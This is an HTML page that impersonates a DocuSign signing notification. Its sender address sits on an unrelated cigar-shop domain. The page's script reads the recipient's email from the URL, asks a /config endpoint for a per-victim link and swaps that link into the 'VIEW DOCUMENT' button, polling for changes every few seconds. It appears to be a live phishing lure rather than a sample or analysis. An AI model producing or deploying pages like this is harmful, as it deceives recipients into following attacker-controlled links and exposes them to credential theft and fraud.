<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>DocuSign Notification</title>
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f4f4f4;
    }
    .container {
      max-width: 600px;
      margin: 20px auto;
      border: 1px solid #ccc;
      background-color: #fff;
    }
    .header {
      background-color: #003087;
      color: #fff;
      text-align: center;
      padding: 40px 20px;
    }
    .icon-container {
      position: relative;
      display: inline-block;
      margin-bottom: 20px;
    }
    .icon-container .material-icons.document {
      font-size: 60px;
    }
    .icon-container .material-icons.check {
      font-size: 24px;
      position: absolute;
      bottom: 5px;
      right: 5px;
      background-color: #fff;
      border-radius: 50%;
      color: #003087;
    }
    .header p {
      font-size: 18px;
      margin: 0 0 20px 0;
    }
    .button {
      display: inline-block;
      padding: 10px 20px;
      color: #00aaff;
      border: 2px solid #00aaff;
      text-decoration: none;
      font-weight: bold;
      border-radius: 5px;
    }
    .content {
      padding: 20px;
    }
    .sender {
      font-weight: bold;
      color: #333;
    }
    .timestamp {
      color: #666;
    }
    .footer {
      padding: 20px;
      font-size: 12px;
      color: #666;
    }
    .footer .powered-by {
      margin-bottom: 20px;
    }
    .footer .disclaimer {
      background-color: #f9f9f9;
      padding: 10px;
      border: 1px solid #ddd;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <div class="icon-container">
        <span class="material-icons document">description</span>
        <span class="material-icons check">check_circle</span>
      </div>
      <p>You have a new document to be signed.</p>
      <a id="viewDocBtn" href="#" class="button">VIEW DOCUMENT</a>
    </div>
    <div class="content">
      <p class="sender">contact@irishcubancigars.com</p>
      <p>You have received a new document on (<span class="timestamp">28/4/2025 13:59:05</span>) that requires your signature.</p>
    </div>
    <div class="footer">
      <p class="powered-by">Powered by <strong>DocuSign</strong></p>
      <div class="disclaimer">
        <p><strong>DO NOT SHARE THIS EMAIL</strong></p>
        <p>This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others.</p>
      </div>
    </div>
  </div>

</body>

<script>
(function() {
  let lastEmail = null;

  function getEmailFromUrl() {
    const params = new URLSearchParams(window.location.search);
    return params.get("email");
  }

  async function refreshConfig(email) {
    try {
      const res = await fetch(`/config?email=${encodeURIComponent(email)}`);
      const cfg = await res.json();
      document.getElementById("viewDocBtn").href = cfg.DOCUMENT_URL;
    } catch (err) {
      console.error("Config load failed", err);
    }
  }

  function checkForEmailChange() {
    const email = getEmailFromUrl();
    console.log(`Checked email and found ${email}`)
    if (email && email.length > 4 && email !== lastEmail) {
      lastEmail = email;
      refreshConfig(email);
    }
  }

  // Run at page load
  email_retrieved = getEmailFromUrl()
  refreshConfig(email_retrieved ? email_retrieved : "");
  
  // Watch periodically (since user can manually edit URL bar)
  setInterval(checkForEmailChange, 3000);

})();
</script>

</html>
